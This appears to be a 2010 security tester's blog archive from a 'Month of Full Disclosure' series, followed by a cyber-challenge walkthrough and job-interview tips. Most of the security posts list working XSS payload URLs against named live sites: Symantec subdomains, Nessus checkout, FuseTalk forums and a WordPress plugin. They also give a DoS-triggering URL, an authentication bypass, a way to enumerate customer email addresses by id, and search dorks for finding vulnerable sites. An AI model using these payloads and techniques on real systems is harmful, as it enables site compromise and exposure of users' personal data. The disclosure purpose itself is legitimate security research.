Symantec 20 XSS issues
I have written a new tool called SubFinder (provisional name subject to change).
It does exactly as the name suggests. It will find Subdomains on any given host. It will do this via a few methods, first it will look in a couple of obvious places and then it will bruteforce the rest.
It will be released in the next couple of days.
I wanted to test it so I ran it against Symantec.com
I got over 200 subdomains found. (not all could be browsed, but loads were)
From the domain list I thought i would check some of them over for XSS issues. The reason that you will find more issues is because firstly these sub domains are usually used to host mini sites, or sub sites. When/If there is a code review then these can be missed.
Also SubDomains are more often than not coded by outsourced suppliers so even if Symantec had great processes in place (which they don’t) , there is a chance that the outsourced suppliers do not.
(1) symantecenterprise XSS
(2) Symantec Connect Search Feature XSS (May only work in IE?)
(3) https://et.symantec.com XSS
(4) http://maillist.entsupport.symantec.com XSS
(5) Bit of a strnge one this, if you go to https://renewalcenter.symantec.com/
and into the email box type
“><</div><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>
you should get an error which states invalid email address entered.
Now change the URL to
https://renewalcenter.symantec.com
and Bingo XSS (is it being stored? making it a sotred XSS
I don’t think so but not 100% sure)
(6) http://www.symantec.com/ XSS (IE browsers only?)
(7) open redirect to XSS – http://www.messagelabs.co.uk/ XSS -
Seems to only work in Firefox?, and not in IE?
(8) http://www.symantec.com/ Connect Forward XSS
IE only?
(9) https://symantecevents XSS
Site development on the above seems to have outsourced to
http://verite.com/our-work/by-client/client-focus/?client_id=2
I’m guessing all of their sites for symantec would be easy targets.
(10) http://seer.entsupport.symantec.com/ XSS
(11) http://aka-community.symantec.com
(12) https://careers.symantec.com/ XSS (may need to visit page twice as the
first time sets the cookie)
(13) https://chat.symantec.com XSS
(15) https://www4.symantec.com/ XSS
(16) http://seer.entsupport.symantec.com/ Navbar XSS
(17) Ouch Denial Of Service (DOS) via Bad Param Injection =
http://techcenter.symantec.com redirect to http://techcenter.symantec.com/ecampus/enterprise =
which works fine as do all other URLs on this techcenter subdomain.
However if I now use the url =
http://techcenter.symantec.com/ecampus/enterprise?cat=null&cmd=sc&courseNo=DP6000&EXValue=null&file=null&module&page=null&siteName=sena&type=g_
Then every url on that subdomain gets blown and the server responds with a http 500server error. This creates a Denial of Service on that Subdomain.
(18) http://cybercrimenews.norton.com XSS
(19) Every Symantec customer email address can be grabbed = just change the id. you could start at 1 and work your way up. This is very easy to automate. looks like over 16 million potential email addresses?.
(1)
https://symantecenterprise.rsys3.net/servlet/campaignrespondent?FIRSTNAME=qq&LASTNAME=qqqq&COMPANY=qqqq&JOBTITLE=Vice+President&ADDRESS1=qqqq&ADDRESS2=qqqq&CITY=qqqq&STATEPROVINCE=AK&COUNTRY=United+States+of
+America&POSTALCODE=90210&PHONENUMBER=999&EMAIL=qqqq%40aaa&COMPANYSIZE=1+to+10&QUESTION=0659ttm</textarea> <br /><script>alert(‘The TestManager SymanTec Xss SubFinder
Test’)</script>&button=Submit&_RequiredFields_=FIRSTNAME%2CLASTNAME%2CCOMPANY%2CJOBTITLE%2CADDRESS1%2CCITY%2CSTATEPROVINCE%2CCOUNTRY%2CPOSTALCODE%2CPHONENUMBER%2CEMAIL%2CCOMPANYSIZE&_EMailFields_=EMAIL&_Real
Fields_=&_IntegerFields_=&_BannedFields_=TRUE&_ID_=symc.2114.-2&Campaign_=JK_Form_RequestSalesCall_MASTER&charset_=UTF-8&_InlineResponseRule_=true&_Sent_=2010-08-23+16%3A19%3A41.610&ACTIVITYCODE=92078&EMail_
=92078&__HIDDEN_FIELD_NAMES__=_RequiredFields_%3B_EMailFields_%3B_RealFields_%3B_IntegerFields_%3B_BannedFields_%3B_ID_%3BCampaign_%3Bcharset_%3B_InlineResponseRule_%3B_Sent_%3BACTIVITYCODE%3BEMail_%3B__HIDD
EN_FIELD_NAMES__
(2)
http://www.symantec.com/connect/search?filters=01a1ttm–”);</script><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,115,115,32,83,
117,98,70,105,110,100,101,114,32,84,101,115,116))</script>
(3) https://et.symantec.com/signup/thanks.html?fn=ttm</div><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>&em=aaaa@aaa.c
(4) http://maillist.entsupport.symantec.com/subscribe.asp?ddProduct=18d4ttm–”></form><script>alert(‘The Test Manager.com Sub Finder Symantec Test’)</script>&EmailAddress=&password=
(5) Bit of a strnge one this, if you go to https://renewalcenter.symantec.com/storefront/app/storefront.jsp?action=transferReloadCheckAccount&_requestid=99999
and into the email box type
“><</div><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>
you should get an error which states invalid email address entered.
Now change the URL to
https://renewalcenter.symantec.com/storefront/app//storefront.jsp?action=transferReloadLogin&success=yes&_requestid=99999
and Bingo XSS (is it being stored? making it a sotred XSS – I don’t think so but not 100% sure)
(6) http://www.symantec.com/business/support/knowledge_base_results.jsp?SearchTerm=ttm”/><script>alert(‘The TestManager SymanTec Xss SubFinderTest’)</script>&ddProduct=&pid=&content=all
(7) open redirect to XSS – http://www.messagelabs.co.uk/resources/blog.aspx?link=javascript:alert(‘The Test Manager Sub Finder Symantec XSS Test’) – Seems to only work in Firefox? , and not in IE?
(8) http://www.symantec.com/connect/forward?path=2e6fttm–”);</script><script>alert(‘The Test Manager XSS Test for Sub FInder’)</script>
(9)
https://symantecevents.verite.com/?action=main.dsp_register&error=42f2ttm–</div><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,99,32,88,1
15,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))</script>
Site development on the above seems to have outsourced to http://verite.com/our-work/by-client/client-focus/?client_id=2& – I’m guessing all of their sites for symantec would be easy targets.
(10)
http://seer.entsupport.symantec.com/email_forms/sendmail.asp?ddProduct=&SrvURL=&type=10&strName=a&strEmail=ttm–%3C/p%3E%3Cscript%3Ealert%28%22TheTestManager%20Sub%20Finder%20Symantec%20test%22%29%3C/script%
3E&topic=symantec&strBODY=aaa&submit2=Send
(11)
https://symantecevents.verite.com/?action=event.dsp_cancel&event_id=17895&error=ttm–</div><script>alert(String.fromCharCode(84,104,101,32,84,101,115,116,77,97,110,97,103,101,114,32,83,121,109,97,110,84,101,
99,32,88,115,115,32,83,117,98,70,105,110,100,101,114,32,84,101,115,116))</script>test
(12) http://aka-community.symantec.com/lib/jsp/socialbookmarkingjs.jsp?lg=en&ct=us&segment=ttm–”);</script><script>alert(‘The Test Manager Xss Test using Sub Finder on Symantec’)</script>
(13) https://careers.symantec.com/psc/jobs/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL?4210ttm–”;</script><script>alert(‘the test manager xss test of sub finder on Symantec’)</script>test& (may need to visit page
twice as the first time sets the cookie)
(14) https://chat.symantec.com/sdcxuser/lachat/user/reentry.asp?email=05edttm–”><script>alert(‘XSS TEST’)</script>&lg=en&noqcode=
(15) https://www4.symantec.com/Vrt/vrtcontroller?EMAIL=0d07ttm–”><script>alert(‘The Test Manager Subfinder Xss
Symantec’)</script>&PASSWD=a&CONFIRM_PASSWD=a&a_id=48182&s_id=70&p_id=null&COMMAND_DESTINATION_URL=null&REDIRECT_PAGE=null&p_locale=en_US&l_id=&article_title=Results&t_id=62243672&t_s=1283128779469&EMAIL_AS_
USER_FLAG=Y&FRM_ACTION=Create+Account&ru=null
(16) http://seer.entsupport.symantec.com/nav_bar/side_nav.asp?ddProduct=ttm%22%3E%3Cscript%3Ealert%28%27The%20Test%20Manager%20Sub%20Finder%20Xss%20symantec%20Test%27%29%3C/script%3E
(17) Ouch DOS via Bad Param Injection = http://techcenter.symantec.com redirect to http://techcenter.symantec.com/ecampus/enterprise = which works fine as do all other URLs on this techcenter subdomain.
However if I now use the url = http://techcenter.symantec.com/ecampus/enterprise?cat=null&cmd=sc&courseNo=DP6000&EXValue=null&file=null&module&page=null&siteName=sena&type=g_
Then every url on that subdomain gets blown and the server responds with a http 500server error. This creates a Denial of Service on that Subdomain.
(18) http://cybercrimenews.norton.com/cgi-bin/search.cgi?target=1f10ttm–”><script>alert(‘The Test Manager XSS Sub Finder Tool Test’)</script>&rule=any&page=2
Nitro Security XSS
Again we come with another (XSS) Cross Site Scripting Bugs on another Security Site.
This time it is on the site of Nitro Security
Now what I find a little bit strange is that Nitro Security states that it has created and sells 3 products which can detect Cross Site Scripting issues on websites.
The issue on there site has been there for a while and one would have thoguht that the company would have run its own tools against its won site to make sure that all is secure.
Unlike other security sites such as Tennable / Nessus etc on Nitro there is no attempt made to protect the site from user created data injections.
And with that I give you Nitro Security XSS Issue.
Nitro Security XSS
The Test Manager Nessus Cross Site Scripting Error
Nessus is a product owned now by Tenable Network Security.
I had originally decided to do a month of Security Site Bugs as most security sites have a higher level of site protection and also they are more of a challenge for a researcher / tester to find bugs on, and lets face it a lot of us do this for the challenge.
Due to the nature of the security business their sites are usually locked down fairly tight.
However you can still a good few issues here and there.
It would also seem that security sites are just as susceptible to code injections and other types of low hanging fruit.
and with that I give you
Tenable Network Security / Nessus – All your Base are Belong to Us.
Tenable / Nessus All Your Base
Bug Details as follows
Well the security isn’t that bad here, they do block a lot of tags, So this means No Script Tags , No Href tags, No Iframe or Frame Tags, No Img Tags,
So I had to get a little creative and hence you have the popular meme of “all your base”
this is done by firstly a Heading Tag which is not blocked and then I’m allowed to use Div Tags and Object Tags, oh year and I’m also allowed to close the TextArea Tag.
Once I worked out what I could use I put it all together see below for the injection.
</TEXTAREA><div><h1>The Test Manager Month Of Security Site Bugs</h1><object width=”480″ height=”385″><param name=”movie” value=”http://www.youtube.com/v/8fvTxv46ano&hl=en_GB&fs=1″></param><param name=”allowFullScreen” value=”true”></param><param name=”allowscriptaccess” value=”always”></param><embed src=”http://www.youtube.com/v/8fvTxv46ano&hl=en_GB&fs=1″ type=”application/x-shockwave-flash” allowscriptaccess=”always” allowfullscreen=”true” width=”480″ height=”385″></embed></object></div>
Now this is just a bit of fun rather than a fully exploitable bug. The reason is that I could not get it to work from the URL.
To get the XSS to work you firstly need to have an item in your shopping cart and then checkout.
Then once your on the
https://products.nessus.org/one-page-checkout.asp page
there is a payment information box. Just put your code into that box and checkout. No need to fill in the rest of the form boxes the injection works when the form reloads.
Enjoy.
Martin H
The Test Manager.
I saw a post by d3v1l of http://security-sh3ll.blogspot.com/ where he posts a discovery of a cross site scripting issue on the Symantec site.
I remembered that I had found a similar issue a while back and hadn’t got round to disclosing it to them, so I therefore guess its fine to include in the month of full disclosure.
And with that I give you a new Symantec XSS bug.
Symantec XSS
Notes about the bug are as follows.
the issue is caused by Symantec not checking that html comments cannot be ended via user input. So all I had to do was to close the HMTL comment tag and then insert any code I saw fit. In this case a very simple JavaScript Alert box as is the norm with demonstrating XSS bugs and I also added a little Iframe.
Liggat Authentication Fail
This post will be a disclosure on how to not design and implement a login processes.
Ligatt Security and Gregory Evans the main man behind Ligatt has come under quite a bit of flack recently for doing things like alegedly making threats to other researchers and also for alleged plagiarism .
While all of this Internal Security Industry bickering is beyond me and this post. I would not trust a company with protecting my data if they can’t even protect their own.
And with that said. / Month Of Full Disclosure item 3 = Ligatt Security and how not to write an Authentication Process.
Text Version Here
Ligat Security – Authentication Bypass
————————————-
Vulnerability ID: Month Of Full Disclosure 3 = MOFD3
————————————
Product: LocatePC
————————————-
————————————-
Vendor Tag Lines: Cyber Security is never an issue with LIGATT on your side
————————————-
Vendor Notification: 05 August 2010
Public Disclosure: 05 August 2010
————————————-
Vulnerability Type: Authentication Bypass
————————————-
Status: Public Disclosure – Not Fixed, Vendor Alerted,
Awaiting Vendor Response
————————————-
Risk level: High
————————————-
Credit: Martin Hall – TheTestManager
————————————-
Vulnerability Details:
If you visit the LocatePc page
in a normal browser you will be redirected to the login page.
However if you visit the same URL in a browser where Follow Redirects is turned off
then you will not be redirected and you will be able to use the LocatePC functionality.
Instructions Follow for Opera.
Click on Tools
Click on Preferences
Click on Advanced
Click on Network
Untick “Enable automatic redirection”
Click on OK
Now follow this URL
Ligatt Authentication_ByPass
Show me where that PC is
————————————-
Sample URL’s
————————————-
Solution:
Currently I’m not aware of any vendor-supplied patches or other solutions.
If you are aware of more recent information related to this issue please notify me at: martin@hb-help.com
————————————-
Other Miscellany Information
Month Of Full Disclosure
1-Click Retweet/Share/Like Lets users Retweet, Share and Like pages from your site back to their Twitter followers and Facebook friends with just one click. The user experience is similar to Facebook Like button but expanded to Twitter and Facebook Share.
The above WordPress Plugin has multiple Cross Site Scripting (XSS) Bugs due to the “fc” the “fs” and also the “fblname” Parameters not correclty sanitising data input
This was discovered in a routine security check on my own site, where up until yesterday I was like hundreds of other wordpress sites running the above plugin.
The plugin does not integrate whoely with the worpress blog and instead it calls home via an IFrame which is where the XSS hole exists.
Every site which has this plugin would therefore call the vunerable URL however that URL due to being an Iframe exists on the vendors site. (http://www.linksalpha.com)
This mitigates the risk of the WordPress Plugin against the site hosting it. However due to poularity of the plugin, it is deemed still to be a medium risk issue. Plus the fact that there may and most likely are other issues with the plugin which I have not taken the time to research.
See below for the disclosure.
Text Version Here
XSS vulnerability in Links Alpha WordPress Plugin
————————————-
Vulnerability ID: Month Of Full Disclosure = MOFD2
————————————
Product: 1-click Retweet/Share/Like
————————————-
Vendor: Links Alpha ( http://wordpress.org/extend/plugins/1-click-retweetsharelike/stats/
or http://www.linksalpha.com/)
————————————-
Vulnerable Version: 2.0.1 Which is current version and Probably Prior Versions
————————————-
Vendor Notification: 03 August 2010
Public Disclosure: 03 August 2010
————————————-
Vulnerability Type: XSS (Cross Site Scripting)
————————————-
Status: Public Disclosure – Not Fixed, Vendor Alerted,
Awaiting Vendor Response
————————————-
Risk level: Medium
————————————-
Credit: Martin Hall – TheTestManager
Site = http://www.thetestmanager.com
twitter = @thetestmanager
Vulnerability Details:
There exists multiple XSS errors in 1-click Retweet/Share/Like WordPress Plugin.
————————————-
Potential Users Affected = minimum = ??? users
It’s a WordPress Plugin which is installed to sites on average 300-400 times a week
————————————-
Dork to find Vulnerable Sites (2)
inurl:http://www.linksalpha.com/social?link=
or
src=”http://www.linksalpha.com/social?link=
Because it loads on sites in an Iframe the dork is not straight forward.
————————————-
Sample URL
http://www.linksalpha.com/social?link=http%3A%2F%2Fsimplestrength.com%2F2010%2F06%2Fwarriors-come-out-to-play%2F&fc=28a2ttm–%22%3E%3Cscript%3Ealert%28%22TheTestManager.com-%20Month%20of%20Full%20disclosure%22%29%3C/script%3E&fs=arial&fblname=like
————————————-
Solution:
Currently I’m not aware of any vendor-supplied patches or other solutions.
If you are aware of more recent information related to this issue please notify me at: martin@hb-help.com
Users are recommended to use NoScript or other XSS mitigating software
Admins are adviced to keep an eye out for an update to the plugin.
(Although as the issues affects code on LinksAlpha Site they should be able to fix the issue without a WordPress Plugin Update)
————————————-
Other Miscellany Information
N/A
The Test Manager
***EDIT***
I received notification from FuseTalk that the below issues should now be fixed on their site. This should mean that patch should be rolled out to customer sites in the near future.
With this in mind I have agreed to their request to remove references to the names of their customers from my post.
***END EDIT***
Fuse Talk is a forum software widely used on the web.
Yesterday I found multiple XSS holes while browsing the ******* Forum site.
******* uses FuseTalk as it’s forum software.
Now there are a few strange things here.
Firstly ******* is a security firm and you would have thought that they would have picked this up, or at least carried out a review of any software before adding it to their site. The other strange issue is that the software vendor FuseTalk is not even running the latest version of the software on their own site.
Anyway see below for the disclosure.
Text Version Here
XSS vulnerability in FuseTalk Forums
————————————-
Vulnerability ID: Month Of Full Disclosure 1 = MOFD1
————————————
Product: FuseTalk
————————————-
Vendor: FuseTalk Inc
( http://www.fusetalk.com/Company/AboutFuseTalk/tabid/111/Default.aspx )
————————————-
Vulnerable Version: 4.0 Which is current version and Probably Prior Versions
————————————-
Vendor Notification: 02 August 2010
Public Disclosure: 02 August 2010
————————————-
Vulnerability Type: XSS (Cross Site Scripting)
————————————-
Status: Public Disclosure – Not Fixed, Vendor Alerted,
Awaiting Vendor Response
————————————-
Risk level: Medium
————————————-
Credit: Martin Hall – TheTestManager
Site = http://www.thetestmanager.com
twitter = @thetestmanager
Vulnerability Details:
There exists multiple XSS errors in FuseTalk Forums.
These errors exist even months/years after previous XSS HTML /SQL injection
errors were reported to FuseTalk.
It is time for a full and through source code review guys.
————————————-
Potential Users Affected = minimum = 250,000 users
******* = 5664 Users
FuseTalk forums = 11357 Users
*** = 103488 users
*** **** = 43767 users
******.com = 79718 users
**********.com = 31396 users
********.com = 23033 users
————————————-
Dork to find Vulnerable Sites (1)
fusetalk “users are registered”
Dork to find Vulnerable Sites (2)
© 1999-2010 FuseTalk Inc. All rights reserved.
————————————-
Sample URL’s
http://forums.fusetalk.com/usersearchresults.cfm?keyword=ttm–” ><script>alert(‘TheTestManager.com- Month of Full disclosure’)</script>&FT_ACTION=SearchUsers – (Tested in IE8)
http://supportforums.*******.com/categories.aspx?catid=76&FTVAR_SORT=date&FTVAR_SORTORDER=0017ttm-” style=x:expression(alert(“TheTestManager”)) ttm=” (Tested in IE7)
————————————-
Solution:
Currently I’m not aware of any vendor-supplied patches or other solutions.
If you are aware of more recent information related to this issue please notify me at: martin@hb-help.com
Users are recommended to use NoScript or other XSS mitigating software
Admins are advised to change forum software, or put pressure on FuseTalk to carry out a full source code review.
————————————-
Other Miscellany Information
http://www.fusetalk.com/ProductsServices/FuseTalk/WhosUsingFuseTalk/tabid/72/Default.aspx
Sample URL’s
Month of Full Disclosure
As the main title of this post states, August 2010 will be a full disclosure month.
Normally within a month I may talk to around 20 or so organisations advising them of general bugs and security issues within their products or websites. The number varies as I do this as a hobby and not a full time job.
My main job is as a Systems Test Manager.
So I decided to see what happens if I take a month out from doing things the normal way of disclosing all issues to the site or software house first and only when fixes place advising the users. So for August only I’ll be advising the public at the same time as advising the site / or software house involved.
All issues discovered before the month of August and any that are currently being discussed with sites or software houses are not included and will remain closed for public consumption until the issue is fixed and even then only if the company involves gives permission.
I doubt if any humdingers will come out but you never know
If any issues are found which could affect a very high number of users data at risk then I will revert to responsible disclosure, and give the vendor time to fix the issue.
Martin Hall
Posted by admin on Jul 27, 2010 in
Today's News 
Cyber Challenge
This is the total walk through and it wasn’t easy.
(1) first go to the main challenge page and then grab the cypher
https://cybersecuritychallenge.org.uk/docs/cybersecuritychallenge.txt
Now from looking at the text you can see the obvious thing and that is it looks like a base64 encode. This can be seen in the fact that base64 encodes will end in an equal sign if the total bits of data cannot be equally converted from 34 bits to 32 bits.
So we grab the text and run it through a base64 converter.
http://www.opinionatedgeek.com/dotnet/tools/base64decode/
This then give us a raw .bin file
I recommend using a Hex file viewer, however I used EditPlus Text Editor as it was closer to hand.
I saw what looked like a file header
it had EXIF (which I know to usually mean camera files).
and more importantly I also saw JFIF which is the JPEG File Interchange Format (JFIF)
From here I guessed that I would firstly grab EXIF Tool to decode and potential EXIF data as I thought it would have a message hidden in the camera name or something similar.
There was no interesting info so I just changed the file extension to JPG and thought I would check what I had and then I saw the XKCD comic.
Personally my fave one is
Exploits of a Mum
however you one is
Total Time Start to Finish = 12 minutes.
**EDIT**
I was informed this morning that I was not quite there. I got a tweet from@Cyberchallenge stating that if I sent my email about the cipher to a certain email address then I had got it wrong.
So I thought back to the drawing board and lets look again at the image. Firstly look in a Hex Editor and I saw what I thought was a phone number. 01444.’9=82<.342 = 01444-982-342 well it would seem that I was on the wrong track as that number is not in service.
So I then loaded up another EXIF viewer and again nothing.
I then looked at the original image on the XKCS site and I noticed that it was a PNG and not a JPG, if it was just a case of getting the normal image when why change its extension and also why all the extra white space.
I then carried out a quick check on TINEYE. (which is a great tool). however this also gave nothing except it did let me compare other images out there against the one I had earlier decoded and my image was the only one with the morse code around the edge.
I then looked a little closer and thought it was binary. Also like the pits used when burning the lead in section of a protected DVD / CD.
I then read up on hiding binary in images. – Suggested reads are.
http://terpconnect.umd.edu/~minwu/public_paper/Jnl/0408binwmk_IEEEfinal_TMM.pdf
http://figment.cse.usf.edu/~sfefilat/data/papers/TuBCT9.10.pdf
http://www.springerlink.com/content/k28787j31153565m/
I then loaded up Paint.Net and began to play.
Firstly looking at the Histograms. If you move them around you’ll see that the boarder is a different layer than the rest of the image.
This then confirmed to me it was binary and all I had to do was to try and count the pixels to see where a binary code started and ended.
Paint.Net has a Pixel grid so I loaded this up and began to count.
White Pixels = Zero and Black Pixels = One
010000110111100101110010011011100110011001110010001000000111001101100010011110010111100101100010 and so on and so on
I then grabbed the text and loaded that into a binary to string converter and this gave me garbled text. = Cyrnfr sbyyb in the example above.
I then used google to check the text and I found only one result and it was 2007 on a site called Perl Monks
This thread has some one attempting to decode a piece of text and it has one of our words. = Cyrnfr
It was suggested Rotr13, so again I read up on Rotr13 and its a simple encryption where the letters are rotated 13 chars . So this gave me Please follo (looks like please follow)
I now knew that i was right about the binary and all I had to do is to count the whole image and then rotate each of the letter 13 places.
This then gave me
Please follow this link: https://cybersecuritychallenge.org.uk/834jtp.html https://cybersecuritychallenge.org.uk/834jtp.html
Game Over - ** at least that’s what I thought **
I visited the URL and got a new code !! – this one although easier actually took longer as it was custom code and I didn’t bother to code a parser (which I now wish I had done) so I had to decode it all by hand.
68edcdec4e2c8eae8d2c8e2dedcd6e04d2042fedae52ceac04ccedaecd8c042ccd8c046
cedad0e8dac8eac8c048e0dac044aa82889046c0d2c8d8daccdecacc5042bedae4e04e
e2dcd046ced8cac042d6e04046c2f4c664ea76e666cae4e268e2f456c0d088d8d66cde
cac6546c6a506e6a546062606c504a141a1410a8dac2c6eac04acad2c2d8d048e0d2d
6e046ced8cac048eed04edae4e048eac2cad042c8e04adac8c2d2c086c2f4cac4e6eac
6cae4e2d8e2f6c0d2c8d8daccdecacc5ed4eecc5ae6dc50429cc042fedae524eac048e
0dac04cc2d4e6e8e040eac4e6eedcd048eed048ced046eed85042ccd8c046c2ccd0
40e4eedceac042fedae04adacac8e048e0dac04ac8d2dec2d4c2d8d2d8e2f046c4e2d
8eac4e2d2c0405484e2d8e2d6e0d046c2d8e2d4faccd046cae4e4eaccd8e8d2f044ea
c6e2d8caccd8e042dcd048e0dac04aa692504eeac04ee2d8d8d044cac042dcd048ee
dae6c0d048eed042c8cce2d6eac040dedee048eed046c8d2c2dad042fedae4e040e4e
2d4facc504eaac8d8d048cedcdac042ccd8c04eceded8c048dae6c6d042dcd048e0da
c04682f4cac4e046aac6cae4e2d8e2f04680d2c8d8daccdecac046cedad0eac8e2d8e2
dedcd6e048e2c6d2dcdec040e8d2c6cac048e0d4eedaeec0dedae8e048e0dac044eac
6e8e04edcc048e0dac042fac2c4ec5
The part that gave the code away was that I figured it would start with a well done message so I counted the chars and looked for well done or other words like congratulations. (it was all hex so it wasn’t too hard) I was right about the congrats message plus the fact that the spaces were easy to guess. I still ended up with a few question marks but I still got to the bottom of it.
see below for the key and the cracked code.
04 = space
0D = H
0E = P
08 = a
26 = i?
2B = y?
2C = A
2D = I
2F = Y
4C = B
4E = R
4F = Z
52 = ‘
66 = e?
68 = C
6c = c
6D = k
6E = s
8C = D
8D = L
8E = T
AC = E
AD = M
AE = U
C5 = fullstop
CC = F
CD = N
CE = V
D2 = A
ea = W
EC = G
ED = O
EE = w
a7 =?
45 = ?
65 = ?
46 = ?
c6 = ?
A1 = ?
41 = ?
congratulations a youve found and completed the ???? challenge.
your pin code is cyber?security?challenge???????????. ?????lease
email this code to our team to media@Cybersecuritychallenge.org.uk
F YOU’re The First Person to do so and can prove you meet the eligibility
criteria ? ? British citizen currently resident in the ??? we will be in
touch to advise how to claim your prize.
Well done and good luck in the Cyber Security Challenge Competitions taking
place throughout the rest of the year.
Posted by admin on Jul 22, 2010 in
Interviews,
Testing,
tips 
Landing a Dream Job
I’ve recently been interviewing for a Lead Tester to join my Team and I’ve been a little dismayed about how unprepared some of the candidates are for interviews be they telephone interviews or face-to-face interviews.
So I’ve decided to put together a few little hints and tips to hopefully help candidates in the job market land their dream job.
- Firstly make sure you customise your CV for each job you apply for. Never send a generic CV to a company and expect it to be good enough. Look through the job specification and list of requirements and tailor your CV to match what they are looking for. Go through your past roles and pick out the parts of the role that matches what you think match the Job Specification.
- Now lets take a look at the cover letter. They do have a bearing on if you will get noticed and virtually all potential employers will look at your cover letter before they look at the CV so make it count. It needs to be about you on a personal level as the CV will tell them all they need to know on a professional level. Hopefully you’ll be like myself and have a real passion for testing if that’s the case then you need to make sure that it comes across in the cover letter.
- Do your homework on the person who you be looking at your details and also the department where you would like to work for. Doing your homework on the company alone is not enough. Anyone can visit the company website and read the blurb however you need the edge so research as much as possible and then use all of that research to let them know you’ve taken the time and effort to find out more than the average Joe about what they do.
- If the Company in question has a Careers or Job offers page or sub site then make sure you register and upload your details before sending in your CV. Not only does it show your interested, it will also show them that your serious about working for them and you are not just sending in your details to every company that comes along.
- If you go to a Careers Fair make sure you have your customises CV with you. It should be no more than 1 page of A-4 you may use both sides if you must however try and bullet point to one side. This CV version is just for the company staff member or Test Manager to see if they think they would like to know more.
- At a careers fair tell them about you and not about your CV they can read the CV however what your CV will not say is what type of person you are and what things excite you.
- Make your CV results oriented. It will mean more if you state I did this and the positive result for the business was this, over I this this.
- Please show some emotion. You may not believe it, but it’s hard work interviewing all day. It makes it much easier on the both sides if the interviewer can see that the interviewee is excited about coming to work for their company.
- Remember not to be so nervous, I always tell interviewees that an interview is a two way process and that they should be interviewing us to see if we match up to their ideals as well as us interviewing them to see if I think that they would be a good fit into my Testing Team.
- Keep a note of who you have applied to and if you had a Telephone interview then during the conversation make sure you note down any keyword which you think may be relevant. You can relate these back to the interviewers in a face to face interview.
- Look into Forer Effect Statements / NLP / Confirmation Bias and Subjective Statements. However before you attempt to use any of these techniques make sure you know what your doing as they can work against you if you do not know how to use them correctly. Once mastered you’ll find them indispensable not only in interviews, they can help out also in every day business.
- Look for yourself in a Search Engine and make sure that what you find is suitable. This means that if a potential employer Googled you, would they get a positive result or not?.
- Salery Negotiation – Make sure you know how much it would take for you to leave the place you are currently working and if asked never answer with an “Urmmm” or “I’m looking for something around” . Let them know how much you would like and have a reason why you think that you are worth that amount.
- The most import and last one is BE HONEST.
Good Luck
Martin Hall
Tags: cover letter, cv, dream job, employment, interview, job specification, qa, recruitment, telephone interview, Testing, tips and tricks